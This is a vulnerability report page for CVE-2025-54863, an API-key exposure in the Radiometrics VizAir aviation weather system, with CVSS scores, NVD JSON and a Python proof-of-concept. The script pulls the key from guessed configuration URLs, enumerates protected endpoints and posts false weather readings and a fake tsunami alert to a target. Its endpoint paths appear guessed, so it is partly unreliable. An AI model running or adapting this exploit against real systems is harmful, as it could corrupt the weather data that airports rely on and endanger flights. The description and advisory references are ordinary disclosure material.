Security Vulnerability Report
CVE-2025-54863 CVSS 10.0 CRITICAL

CVE-2025-54863

Published: 2025-11-04 17:16:23
Last Modified: 2025-11-12 14:13:18

Description

Radiometrics VizAir is vulnerable to exposure of the system's REST API key through a publicly accessible configuration file. This allows attackers to remotely alter weather data and configurations, automate attacks against multiple instances, and extract sensitive meteorological data, which could potentially compromise airport operations. Additionally, attackers could flood the system with false alerts, leading to a denial-of-service condition and significant disruption to airport operations. Unauthorized remote control over aviation weather monitoring and data manipulation could result in incorrect flight planning and hazardous takeoff and landing conditions.

CVSS Details

CVSS Score: 10.0
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:radiometrics:vizair:*:*:*:*:*:*:*:* - VULNERABLE
Radiometrics VizAir, all versions (as of the disclosure date)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json
import sys

# CVE-2025-54863 PoC - Radiometrics VizAir API Key Exposure
# Target: Radiometrics VizAir weather monitoring device

def exploit_vizair(target_ip):
    """
    Exploit for CVE-2025-54863: Radiometrics VizAir REST API key exposure
    This PoC demonstrates how an attacker can retrieve the API key from
    publicly accessible configuration file and gain unauthorized access.
    """
    # Step 1: Try to access the exposed configuration file
    config_urls = [
        f"http://{target_ip}/config/api_key.json",
        f"http://{target_ip}/api/config",
        f"http://{target_ip}/settings.json",
        f"http://{target_ip}/api/v1/settings"
    ]

    api_key = None
    for url in config_urls:
        try:
            response = requests.get(url, timeout=5)
            if response.status_code == 200:
                data = response.json()
                if 'api_key' in data:
                    api_key = data['api_key']
                    print(f"[+] Found API Key at: {url}")
                    print(f"[+] API Key: {api_key}")
                    break
        except:
            continue

    if not api_key:
        print("[-] Could not retrieve API key from common config locations")
        return None

    # Step 2: Use the API key to access protected endpoints
    headers = {
        'Authorization': f'Bearer {api_key}',
        'Content-Type': 'application/json'
    }

    # Enumerate available endpoints
    print("\n[+] Enumerating protected API endpoints...")
    endpoints = [
        '/api/v1/weather/current',
        '/api/v1/config',
        '/api/v1/alerts',
        '/api/v1/data/export'
    ]

    for endpoint in endpoints:
        try:
            resp = requests.get(f"http://{target_ip}{endpoint}", headers=headers, timeout=5)
            if resp.status_code == 200:
                print(f"[+] Accessible: {endpoint}")
        except:
            pass

    # Step 3: Demonstrate data manipulation capability
    print("\n[+] Attempting weather data manipulation...")
    manipulate_data = {
        'temperature': 999.0,  # False reading
        'wind_speed': 999,
        'alert': 'TSUNAMI_WARNING'  # False alert
    }

    try:
        resp = requests.post(f"http://{target_ip}/api/v1/weather/update", headers=headers, json=manipulate_data)
        if resp.status_code == 200:
            print("[+] Successfully manipulated weather data!")
            print("[-] This could cause aviation safety incidents")
    except Exception as e:
        print(f"[-] Manipulation failed: {e}")

    return api_key

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: python {sys.argv[0]} <target_ip>")
        sys.exit(1)

    target = sys.argv[1]
    print(f"[*] Starting CVE-2025-54863 exploit against {target}")
    exploit_vizair(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54863", "sourceIdentifier": "[email protected]", "published": "2025-11-04T17:16:22.967", "lastModified": "2025-11-12T14:13:17.967", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Radiometrics VizAir is vulnerable to exposure of the system's REST API key through a publicly accessible configuration file. This allows attackers to remotely alter weather data and configurations, automate attacks against multiple instances, and extract sensitive meteorological data, which could potentially compromise airport operations. Additionally, attackers could flood the system with false alerts, leading to a denial-of-service condition and significant disruption to airport operations. Unauthorized remote control over aviation weather monitoring and data manipulation could result in incorrect flight planning and hazardous takeoff and landing conditions."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", 
"modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-522"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:radiometrics:vizair:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-08", "matchCriteriaId": "C403D079-7E0F-420C-8312-90466CB0EF5B"}]}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-308-04.json", "source": "[email protected]", "tags": ["Third Party 
Advisory"]}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-308-04", "source": "[email protected]", "tags": ["Mitigation", "Third Party Advisory", "US Government Resource"]}]}}